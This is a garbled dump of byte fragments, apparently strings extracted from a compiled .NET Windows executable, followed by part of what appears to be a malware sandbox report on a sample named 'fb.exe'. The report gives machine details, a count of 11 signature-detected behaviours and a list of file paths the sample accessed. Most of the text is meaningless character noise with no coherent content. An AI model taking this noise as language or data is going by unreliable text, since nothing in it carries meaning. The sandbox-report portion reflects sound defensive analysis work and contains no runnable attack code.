NcNlN N
ThY@
j|Ic
z%H/l
~UN;]j
N{T
"w!nyG
ZOy}
V5=F
'of%
QLJuo
HJFO
]n:+
_Qg'zLz
7fv[
}!
s9~z
J*i]
9v;&
]-(q
R Kf>b
kh[T3
K/ k3
O_|f`
T$o^
4G,}'_k
?5Qm
)Efp)U:
~lV
I j2
ZW K4
S a m
lfYs
Q\J.
X78K
M fmd
0*M)
h]"f
lV>mO
W =5
$o.B)
T Ym%;
Jm*Q
J:tx=
'9[7T
}9~(
l _
AL<%
Pn.
}gZ,
S9-a
\<1G
Q$1A
S}?=
)n\m**
A1-j
U_Z
`W/mr wP
+ICC4;
>C6u
NGN[NKN
UG~-
VXBSv
978R:
C^Ok
XxrK0
m]#6
4l d
6%}h
p^
}7L,
p=e4}X
~\}i
[eAR
<4ZT`
S^iT
P]5
MJ)>p
\L/Dfea
,(f5
lgv4u!
N N.NJN
E84$
v]&X
n w
zM<Uv")2
1o i
+ANWr.
^$Ns9x
osegSwHemmHPO
?}< aT~
?.AX=
4rz>
\ $b
^4SULBl
X*Mt
d0rAfH
lvH(
M }Ub
g*&
B>b#
D"M ,
.vnu
1+-U8sfw
117Pxt
1{?S
N%N;NVN+N`N"NBNsN,N*NoN NZN N%NkN|
Ka`t!X
s oq
lH1!RqrN;M
-36w
BOT4Ny(B
p)~j
)^}`
wvf
(RNaN
3~}&&
VtYdQnnqx35nwnJ9x
b(_@
cmv?j
{]r{
N$NJN)N
:YM> '5Z
e?5[
WrTU
_u~0
R/bY
^ ]g
get_Message
!This program cannot be run in DOS mode. $
|w*65
4l/V
<&1]o
J(4 kG
Muha
n^4h+
:#(P
A> ?U
@2Oq
B7Z`
xM9
nYZ,
s8V0
)._`
wjpV
;,F,^
;4tg
d%r.}
}z e?G
kby$
L>j9
bi>[q
7 >D
h:]C
WMVy
XK0w
u`\a73dGK
(NVB
"F$qmS
L)S_M
teal
B/`
u/DY
:U!z?M)
@fda
^';.
COWb
a-5s
u/DT
#!TQ
W |
uJp+
1MX;
V^3Gv\
L4(7
F~S )
NwNxNEN9N
HQ #
:N}mj
k#}Q
ox4Md
"GZ]!
%W .
>p:c
J$**
0%ed
$q\n+Gw
N@NYN
aYz)
oy>p
f=#:
i:?e
g7Jv
05W6
LateGet
N!NrN;N1N
P,6X>U
;ufq\
K0X7U
X"$i
:mTWna
9q /
=Zj+
$%aV
8 +c
R{L(
nj?6
GG.|
a/BN@
yL*-
#3%p
qn4;
CO&
oH\E
w?Y&8
/7#X
MH]
w;lna
YEqnxH
gXhJ
j |HdV
{Oul
&b!\
]m b
N<N3N
MdDM4
+}}eo
4^a#
_p }
vq20
3dW{l >
BSJB
H4sz
4Jh&
}5Hq
fsF+
ZLR
~ RM
n-SU
K[ 9l@V_q
Satq/v-
N(NnN
QgYs=
FnAjXUXE2Vab3pOWF4T
jSKmq
nR\S8
?UT
(9a5^] OG$z
P`!D
t;(
qPU&
`]\2
tL}wO
vI^%
%NFee
)f4R
Im&
3Fn^
1`4G
%SM*
/&@A
,k3w
!^@~#
!l{a
3Y&!
H bi
kgXh
VH`m
Kb@~m
r].~
w9#x
B<\gYo7
e7GFgo
co\\{
B&_C
Ku$R
GSY:
WOHs
/9(<u
,4h6|
`<KW}
Y Uuhj=
0KrfO
D>U'
2@k,8Z
xRWc*<
*TpC
.JK]_
FFiF
a,GO
?^`+<
MbTz
&8%Bf
!}\-
'4Gt
>5,lv
Xd]qGB
Zi7A
N*N/N
Mn1
DQEf2
7"q
1<r2
c n\
?IA[/
`L0W
LZ5y
om+;S
V{Bl
1 +2o6
~gM':_
N:NHN
jeg8
!hBr
CH"uB5.
Y)dd
ll}z
?79X
1Dik
^6i
PUy[
,QxqU1x
q=>F9=<
I,eZ
rM<t
+Qp}
H^\T
OhSpq/B)
K*>e
/!q
n7&S
EGc6
w0/KPk\
(5o:;*9
l=uU
1F%7"
~)Gr9k
2Cv-f-
fb
443t
;W<<
bN B*
.T|b
+ TV
S\P.
BN`4
Ln/ F
\l9x
Jdgl{
gLyA|
[*9A
j1pcRuC6VJgC1chx
#qS
Ve[m
ATMx
VGT2
6sSH
C5T$Ob
:_1
{d|b
NdN$N>NCN*N,N
>j @
K=r:(
G"y&
#l>
zzu
,Q]Y
te:"
Ic|8
6O !
gpUH
Ug3
`}5/x)
b"nc
JG(d)
?`SE
q,MP
eL#E@
rx]_^
@uTr
Taz'~
3LPT
~y5N
L8 i
r.&H
)i:G
J[~
>ucuj
"[V:
0>ahRzD,
)lUhM;
-;PgW
S|6
>g%neK
A\#I
xqS4
OpFJ|pK
M/ERU
",7B
4,nv} q
[# Q
S'T9>
d O
$]^&
s$Yey
elq5^
;O N
fVtZQ
D1Cup
Vvs1
'a?Y
}yCi
NON~NXNNNYN
p"=^
eA8 J
59JI
'<R<
@we"
yDJv
>k{fV
f4R<
Pfq P
_"NO
; -!
1U<~
#5 *
1Q xx
/Ra
TWZk
- _<9
;~y:
}^!l&
Z]4d
H Yr
sK d
dK#
U 9,A
PrN?j
1x=s
.m/%Lu
4r2y
*f9
jB'%
~#2
S,@f
NDY]"
mOJ2+
g`a&eu =
M`a~
\o8v
E< ^
dDi3.
?DM
CompilationRelaxationsAttribute
hj[nc
fr .
P 't
2R[
hfyZ
lITd
'AnnJZ
DJ(u
}#@L
l'%]
x} #
oT[:z
tI: I
..d_
}S~7
dH$1J`
ghe^
< fA
4j0=
6)Nq
Jx8CG
EH->
f@=R
NW
]kGy
~p:BU
}A"J
#z O
1`q%2
c6i %
+F=(
U<$?I
RDNi
f{|2!|
F[ _
ey.3hK
F4C|
(qmJ
\2 m}
<d23
j7DM
,%>W=
2s_
qK 5
c#%9
sG{q
[u!|D2&
^BCn/
#thq
<-@,
=_kv
b\ &%
E&0w
]V9l\+eE
Kk|u
, a2
7QK[
I+@;pZ
2K=e$8
eN|{
~'/O
h0o6|l
^LYr
7*hz
fK}/
zW4s
s}~Y
N3N8N=NANBN!N:N
MUOqp
yc]z
kk4.
l^/R
Dw7`
gzJ
OfJ9
0ZNnN3NyN`NUN2NzNJN3N?N7N[N7NHN!N(N%N`N9NMNdNvN
$rFo
--IYO6
Microsoft.VisualBasic
'W>b?
><xL
A$h
%n.P
[I#r
b%CV
=oY1k&)
8|zX
&781
00c*>
0VZO
v/0]akb
j< M
,@-l'
991L
[<Z
e==^
N{^x
5lP#
8LyQ
o il
Mi7Sd
}q hcFw
,9!v
MKTq#
]Bj
svMG'
fx:P
QP.u\
qY@$
iz k%
9VD\5
BOu(p,
^;eT
$N1E
W .
L=qW
PRE!
N]S+
%RsV
E]W$v;>
}al^
j?KD
/u =E
]pea
'Z'~
"y ^
NHt(
c&l
|*hN
HS|9
_x@52
)?~1P
c6[S'
IwJ
Gs@t
USTd^
8m9wo]
uf+CI
O H~
1te+uZ
Ibs=
)O(k
pf |
IR+#
F"~
g9HIT
]^b,
pZEc
mjWP
StringBuilder
o[$PqN
'F4
<#bO{
]Q f`
?.Nu
-t0s{
q+Jx
35md
.=m|
mtLZ
<xVp
mbo`
>B?5^*b
,L1PfU
qK@M
6<np
T9Co&y
ZP;%^
K&pD
?!'5
]gAD
]UAl4n
tY<k
B2N[
6Yw.
$L>sj
]L<8
]N8!
9N`_wdxp
K%]
reHu
N4N3NsN
=[Ou
6$n{
6p0
$0L k}
G[pTr=
".&n
!O I
/BQ+
u0*m
l_Aj
O%x*;
C~m
8#2&
r~\N
I<2'C#4
]y1]
g=@f
DihX
&Ls
%ZB}
^r#%
_WK
gZ<$
{es]
"Vo|n4
g~v6
RrK)
NJ 9
BOKj0
rqd
4\'L
0y4T
*%YiV
SjEP
x]VCdc1
i*U16(?
{#qY
2<Yx
W9{#
fedl
n\l55
h?ok[
EjOZ
#[o;
2fM/r]
k\ F
6J}@Q
s @7
(}!ip
L(|so&
N=Xm5
EP`V
?w/kN
|v l
rs_GQ
=FmU`
H?t
<HJU
Ik SI0
I"3"' h
w`oT
xJ6@=
R33B
&=i;
QST/h
C^*|
}Cm
;ff9
hPZY
`()(
a9.f
<bu%
G0|:
1S3U
.ac
L|e! c3
~# '>(
U%GO
Ng@#
U=}&
iO~
OBdT^
OE-l
WrapNonExceptionThrows
+R)/D
mevi
:d l
q^8D
0QC@&
G |I;}
ol+z
xqS=
Hjq[
BRfP9
`SK^
0@{ZTV#"
Mb Hf
fXC1"
/As
s n+
pgx4
/#/
NhH N
w [+
En[l
;4~U
YV)z
0Yb'd
String
66=&
NuOvL
@5Mh
N:N8N
T]Z^U
VXPd.
tt_e
1ly_
J) J
RW]%
8tWQ
x`]m
m6-@K
IAZ7E
)Y|
(QcP(EM
o Vf
&yC TkL:
Show
4*T+oH
}03
&)Uz
) w}7
akx#9
v"/~
MqfP
6FCp
i 49
.n (}w
L6NHN
G' Qe
-ETw
zc]
i&/a
p o [ u
iYIuo
\5C4
<'S
AfWB
1KJ01
AS f]
dG"7
+&vS
#'9p0B
|0P\9
E nk
Yud5^U
_CorExeMain
L\.:
|(/[b:1$
Rfj
PhFt!#@
L\d6A
N+O
V&d)
'^qb
ty9!%
%+NT
N4NqN*N
:~TW
$f0L
P h#? n
_1
l#39M
CVL=
oac|
$d,W
Jce
9qL/ 1
_:}!M
A.-t
xs8i
i-V/
JIco
o:(
0ND'W
R:RG
:/QQ
U9LZOHdOjAd3UPjKeeP
`u
/42e
02iM
8w /
P)GO
FqND
x?1*
Microsoft.VisualBasic.CompilerServices
b(TQ{
lA^y(\
@2E)
HY_/<-#
(=1A
Kx>g
q ~Eh=u
y.v:
4_.1
v}N:
\K>`V
&cFK2
GiW!
FJ\
hS%Y xi_7
9?H
II9:
@D`09~F
c8D9
[NiA
Vii.h
~d*H
Syl8B
j]G/
'8.ul
M7D^
ParamArrayAttribute
Xh\{
$MI{]Y
<I %I
k]dj
>TdQD[X
/(1HE
{Gpq y
NMNfNSN)N8N
!~xp
9GdeaJ<
qBH
N& yy
dFta
vqY*ZH
-gJgJA
/(rU
WO"y
-~7Xd
Uv/V
'n$;d
(<@Bd
Z"*Z
P}hP
bA4^
'^&vG >
}7S+2Q
8~Qa
d'\.
+QnA
oFe$qdD,L
DwH
NkNBN%NXNxN4N
<\fz
6 (
r(a)
Nj\{
tdd
ZM7P
=mzy
<|g
? XG
5X'+J
xgj&
H[a|\v
R6~<
xyLLU
> x1
L m"
=4KE
%@7F
$h$Q:K
CwR+4]
jDO7
e5QJ
N )
&[0GUxU
;vV[
$~1xH$]f
'dKt
B(Q9g
Y=vW
0cE'
2kG c
[8DU^W
2)'/
I#`v
25N]
VZ,Z
C^7z Y
jE G
EoF
DQ`h
hsDR
A )
~|eB0
Fw@D
~]= +
=2{h^
v-'R
f}hX
H^B9
P9D
:(@zx
~2 {PD
,!O e
Y*z};
lg;2:=G
aEZ!Y^a
n*>QA
CS n
5Lt
s#gd
i5F
[2p
qgsJ8
d09h
L j](
X-r>
8 +3
s^rh
y 07
)QsV a
<8mg
$m@6
4581
hlRp
,k?m
v!)d
0,fp
~mBcL
K^ XY
9 a8
euaO
w0G-
,xF4j
K-g
G3Vg|
( @)
C7iDKg
pDPW
WA(q
cgzh
sLwB
-}oSn"3,,:
iT8>
q2%J
a8C~v
FFqn
wp_tjTh
b@Za
W2l.
#*@m
'rT0
+DvW
~^JL
;fAt
vES
&O^
8B1D~
~7 ;
w]O@$5
k;.1y+J1P2
m98x3[
xMw~/
W[U#
;o2p
h<w~i
:Z7
LkuHU
K.T=
Gn`T
NaN8N
`cK ~
%6iaww
ZwT`
"N=`
"x~H4
$ w#
.yi
@XG
^ 11i
!hc*C7
j!)~
o?^;
e!!M
1o}#
pRO461R%W
dgN /
x8E*
se A
IneN
hE@w`SE^
fd8+4=V
T)S 6o
y4nd
>K+V
YztQ/GQ
34 O
Ukc6BXRRB3cp
4A,U)
lz)~
L.%0
fpMm7u
.{ |
3'yA
mlTA*'!+
X`fK&
Dn13
%u]]b0.{
YEt
(M3U
f$%,Y
d2,
jSp{
L9*
+Ibez
E' ?
K_l4C
zQn9O=}.7
vEv|
f
{oKF0
307>'
>3TF
-Q.t
mQ%aYl
d8gk
9%do
L,Og`
( @G
& ZP
sEKQeNPbVqR1MkV
RX6RC\
;r3Y*
Cm1M|
8;j1
f$$x
s yD
N(NyN=NeN Nld
!
;ZLC:
4!cwp
[-m<
|\(-
hbqc
zk.8
)YN"N-N7NDNGN`NJNRNcN
6I, :
pq4]o
N'NCN
0cjx
J-w&
c@}?
-s2d
7&6^
2Si,
^nUR
Ytyf
W+#I|
-@}
a9 U*
UV2L
nA;~
t:21(
l se=_bA
AI:~
AQNLV
hK-d
YZX8
JGGHlLG8xWOWasY
Vx^k
N`N]NXN
g&w!
Z`"4
uN,0 Z=
OLbK
u*QI4
$nrUf
&)o*
tY @o$
tcaG
*6q`~
by:Sn
i1~f
L0 E+
Si&'
|/AI
Zw+
!228Q
42t oK
=mH<
M8 h
ev/D
@Qu$
DS(NX
_P;?
Mh<#
a(S %t
?/4MR
E9 :
C;DK
\;=i
8 ({
L{<
Tk`Wi
/fIL?
+?$YK
i bX
0RP
1;d'
>d#
T|;
8A.
|EG[
z)z]
(\L2
[!YEwX#
2 L
XYhgK79
(E]&
uetp
<RA|
@B,^I_
@^t6*?
90'+y
[5;i
!]X
=w}w{
eR<Db
FR'^
0 q[
W8vo
vw)u
8z*=K
Append
R<D^
2p PT_S,F
Y27-
{_C!
Sa 4
/bq&4#5
G_x
gB>W
{Ft2
P0|8
_7l~
}<FN%
H#<w
2nI2
ddgn
"kCp
2s#|
wi67
]i7C
Vb!7
Eo}t
ZktGAGE
' f~
] Ra
0q~H&8q
!/,H
4MaA
.| 1m
^Da:S
U08oL
u6yx
d.&Y
HN4X
#Strings
[CB
KPgsm$
C!2$(
IT/fa
vgla
lR#*
q<:7
_ X;q
H&1p
>Q=w
r?>S
+D 9N
xF2p
VGE]o)
9ezG
] &w
+@+i
ce:3
VI:
z Ic*
%Q-Ce
% m1
N\u5
}T3'K
q7xCzd
=9ln
8_5N
h!k_
y,M
3'><
8W|pvt
sMB<
2%.A-
2. "C
ep :(
SAaX
tJ dv
Eig0
;}'@
PGHL
d]qUD
tB Ay1R
]} M
qe|CO\
GI;Q
NEN N2N
6}Ru
+2/A?9T
5 , r
*H|?
NBNGN,N
r/uX%I
S&eK
UrsQ
WW7o-
1(30
K|sX
P2 <
{5-u[~
psu$
EUo9
&P(V
1cx[U
25,w
s<#
|05O
^)d1
"]Oj1
_fB)E2
W x{+
hky
k%Y
)zf:
Iudip_
P9E}
\{eh
./(-;
yb0$=
5*Az
9and
*\d @~)
WB@A
b$>Luyj
J"27
&R7=xT
7Y`@S7.o/
.81T
j>1A}A
8}'G
sxdJ.ppM%
R(0YY
NdNcNHN
ZR9/
0$hP
~ !C
OW*:
)\4W
hZ49RzNISlYs1V0318e
3d]4H3
xi'b#
emSoFHB
G07h
qTs\
SXmn
2*na
2:;|
3';Og
u`i9
}I4f
EV+.
G@Dg{:
xG-~)S
OA&*c
s2MgoO
CrPJ1
qo+K
RM-Sif
}7-V
x4cX$
j<4
vmN#CI
g^O7
OBx
?=e4
o B"F
F_hq
*z"-
xFn2z
Jum&
V31
#Vc
R{Ji)*t
\\HZS-
K^
}^QU
Tk7plUFjP4afKir
TA+
tvkO
NC}`
NWNiNrN
fEFJ
!V0s
>K8{
CK"]~nse
o5V>
z?x[_
uO=g
W;=E0
I95t
K3<gd
&SNO
6xY$D
Fe[yC
rgJ_
4lp7
g3'O
B0vm
Kxi5
T0fZ
RoZl
)if:G
V8.Z
xYjJ
[4,XLY
x ed
/ NJ
,F2=
N N*,
!%6>Z
N>NiN/N
LT,]
_?@
OEH)
-&';
:!R
mnZR
G&Dk
v2.0.50727
% SD
Ja|Y0
(1D
:F-0V
f>EV
n=>$"1
3l+ 8
q3*Y
/|Bf
2er``
U;1 =
TLt"
YWesi
K| ]
%#TcM
-L$dh~
dk!
>?0/
M+F5
a3-K
8^v!
5A'(
O.;N
%V)V#t*p
N`ND
u[=5
b]' 5]
z7g(
L13+D
{f.(
n S
C;y?
+\B
J'|R8
]HC*
3/"t#
*#sN
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
va/
mp
{d\.
odGebI0KDnQ
~n6c (v
Zt+M
H1dv
~$ wW
X{ ~
R@cL
?,
"}%'L
yin.
n]URi8
4-GCl
*wa?
_tsU4
8cD%-
^[u=
y{N#R
" Bw
ZeFr
E_!S
MO>s
DEP1
)4)&
`dlAI
2adI+
[{Vo
A@"2
1l.z'w
{\y}
cbu=
t0.=
L Ca
vKFtc1
@B BEPA
&q ~0
*.s_
O a
F)0 h
& sZ
ablR
mZ)b
E(\a
6/ %
f=)i
I_qAvsC'
lr<x
V"eqN
I#+g
"d `
| 4\o
>-Su
wMeg
*2}n_
!\KGc
0.BU
;9+Q?c~
yYDx
H `i
ROIt4Mf
NxYH
|?%K
["wQ
{Y,N
pu"B
Vgk"F
OCtt
_hH{\?
8Oz3/h,
J?c"6
[P.[
UPN
1fvnu
#UNw
CI[K
_$[bL
=Q Z
Co>D
`:BF
{Kp"
i(-.Y
u0G
?YE d
t&>'
D,8)O
:KSH
4>5&a
fE qN
q"?<
u[R
AJwEL
% ZW
fPt$
Ef!.
3S-c#
9 P%<
YY;o
+b ~(
g)xN
- eQ
K@D#
~@NO0
W[{C3
NkN!N
(T!1
m|T1
+ui
wP>!1f
qOH0
jFP
mIB44
mJ~l
FV1]y
K7D&(
C6qPq
RXN5
`W7*
1*).
kjl.
]:R
]M^
h!Ze4zf
qvfi
|XW
^*%o
>0-e
:: *&
b6vc
v?]/%$
74.!f
*ISxI
C~^>
>;Of
o;xB
QC0&2-
System.Runtime.CompilerServices
@; :t
?0Y,
na^pQ
*w<)
@q_D'ps
js:O
`CkS
Y`
DUZ@x
leg8?
k 9V
y}Mi
l0\i
:#|z
5|IW
D -y7
r?CV
yi7U-
EAG?
#We@Hn`
$ntG
jok
{l%7?-H
p'
^Bb,5
uw^`t
Dd'3G
4`NwNcNDN
bS@q
$ko'
NEE-T
sb z
[~=L
69/d
A \s
*?='
Z:G0
!t Vj
`L"0s
27Ykw
@ ;0
~UX\
FK`,
-,l/
a!N1
P/ j:=a
GR3Gu
rJP9
)~CR
rB d
eBbmu
M&KU
$Td
=jR0
Ha,/
^ F=
AG2:
0MQ<
]#O->
^&B%m
PqQJ
L,NHN9N
6yw~
CAx3
4 rL
@ iP
E{/}
e KU
!E{5g'
Z}$F>
C;iE
q_L
9H~QW
N~NYNkN=N]N8N
=UjQ
# {7
v6gs
dc#k
z+2Z
Ye`&
suC
"[Q =Y
System
P5Go5-x2a`
xTOC !5
N{NtNfN(N
qyq(
+ c>gV
's1j
^!*zH
UWvU
=(Gg
P2GHu
aBPLx
\!0
yjr5
=+0p
lOoOs
uC0x
:(Oqi
x-ht
>)1|
o
c=:$D
j 9(t
* |!Y
jP2zy
*CN"N_NjN
U+T`
h~ ^B
oz=cC
d$JR[
0'\_
BmCS
coo @
rz@lj-
AXzs
Tskl
#Blob
#f`H4
rBM(
inGl
/x51
];Vw
4j+42r
fb[EB
*"0A
N_N5NxN
@8P3D
GmbPlF
"wA/
4<+q
%Xlz0
PT@4eN
cS M@
3OgN
|!;7
F"/xIJ
F5gc{Cmm
> MG
]b!Fq5
:.B.
BKi->
A /$
W_<"
LC& $
_0iu?4
7ZQw
T `
zJobiXO<
skH ;
\)?
sYX2
+=eYO
$]dtp
[4$I
%L+H
sWG9s
L{,)f
^x}Z
vk?fK
s{L+
*W40@
Z \^f)
<?y5&
!vHK
y+Sr.'N
i8Y>
:J+K
0_yc
JvI9(4
Jvi
n. gW
P}v_
5+z]
m8FDG
2R4_
\2tV|
5+h.
L4T
U3[&
7>|~
-a9n
z:WLU3n
c &;
VM}=
sr1Wp'
tBu"h9
M)ex
g&jcX
Db}Y%
:JFb
s* Z6
<1C{
Ez ~sR
Qx<M
U[
3%Mi
ATi{
j`%S
NhN6NlN
v$Vk2S?
Ms:8R)
FT~,
%y(%:
n\dP
vvU
,rxc
VV>g{w
,-tS
Hhgz#
[Z#?
9>%IN `wk
?Vl@
Y/c-
gd76n
OOoaLG#
U12FAfu2v6atv
lC:e
{L5f U
I$gF
N#N!N=N N
Nr0p]
^$rM
9bI{Z%
iZ #
hSw0\@xY
~jxD
gaG1
1K~[A:
w@Rh
o 5s
B3@x
Z u#N@F
=97p
j'nO
A+fX
m?lo
~LKh
p5iO
uCdGUYsLAzWEY
# qsO
092u!
B +R
,qp
rA_8
<#B"
0 :z
NHNnN
0q4y
m fK
;u=oD
qdB
d?c
HygdA!
7d6K
n`>|
EW0O
3ncB
[8Neb7
Vm9 Kf
_?9#
]~U<>
g]_k
l3R@
@Qw3
wx*}ph
:)iU
z]+fs\g
O_cxX
[.8#7O9
(NGE
Q9qd
:w*
=[G}
z4 #
^ElNdj
ga '
nGy&
CvQ9
[+ly
a;j_
I`y#
hGe&pk
Df-;
$PD[
=d2K+
$4"k
a3XA
'%%h
xegF
+ D+\
,tX
`6v)
[yn\
sQ^m#
FrM_
SoRn
=Q} $P
NfN,NzN/NxN/N:N
TOO7( a
NyN.N'N1NlNqN3NuNUN
b/'W
X3s*
>y,7
dDm|~ 3
>58|
!m)!
y;?7y
`8~B V
mSN\t
]/:G
Ek
H(9H
.P{z}
r9
5[}zB
{U7+
D/6,6
u}i!
1bx
$L3v
$5@)
De'ut
#dTN
sH+\l
6W3q
Lr<&
lMBV
T<jiZ
`l7@u
^a )
o8ky
Wpa\
PshC
yH>g
tG$3
%SV
2 3gK
= PO
rT{_
]]d8
0hlf
dMG
>_Z+
/Cu(
j7Sn
e\+sY
. Jx
{}g{f
\ ,/
_3pS
}8g/,
}5:O
ug>z
_>}Z@-
chN F{
`mk B
Bq{uq*~d
dy3#
"aIU
s!lI
N|N/NsN N}N
Ux<5o
JC0nE
G 8G
6=ad
iC
@ .9
[ /zw
^Z S2]
IXv%
72!5
\K~rJ
mscoree.dll
n =]
in<yv
B< 6|3C
r$USm
}?th
ekS%D
_r5x2aY
6&d)AG
\ &K%
! N$
!xTC
Mf+1E(
:a\"
=ocr
-|L}fV
_ hw
6)hg
~lOP_
=h/R
1,R@Ch
[[`9
yjP
ORm]Kn
\ ^[
7:hV
B`c|9
Hjo|
z/Hp
1| aq
d>F[
} 2
Fu3Aa
Du[+PnC
kOdJ
ID\!
g8W$
l{}>
System.Windows.Forms
z@iSW
=V?
D%Lt
%qfp
H~%@
'H QC~
-eIJ
)*X6_~
2>P T
|jFY
k4bx
N3N8N9N7NHN}N5N
6EQg
%Ub0
P).z
}#^S*<
D0:z
2NZ
]TP8
e Shz
C0Y2
,m6.
tB{k]j
?j:]
OGnQ
PCMa
OWvUU
P{P
2Nu2
<BHH
Ab :
]_<]
vM@:n
I-Kq2?
NW25
v\2_
K `
r7Dv
|O(uIG[,
|WseG
e"ve
1 o#{
$4k;
VB>)
C,S*
Ovu4
u~ @
NAuG
hXBC
r >|
eQJ7
FP4u
ymnv(
.,z4a5e
;i'f
1'}V
o v%
vw{v
f |!
QFp!{
koI0
v{;j
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration (s)
Seven01b_64 Seven01b_64 VirtualBox 2018-03-15 15:10:19 2018-03-15 15:13:09 170

11 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration (s)
Seven01b_64 Seven01b_64 VirtualBox 2018-03-15 15:10:19 2018-03-15 15:13:09 170

10 Summary items with data

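Files

Note: this list appears to record every path the sample opened or queried, including wildcard searches (e.g. reg.*) and DLL/config search-order lookups across PATH directories, so a path listed here is not necessarily a file that exists or that the sample created. Use the Write Files list for what was actually dropped.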

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\fb.exe.config
C:\Users\Seven01\AppData\Local\Temp\fb.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\fb.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\fb.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources\ncvmx.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources\ncvmx.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
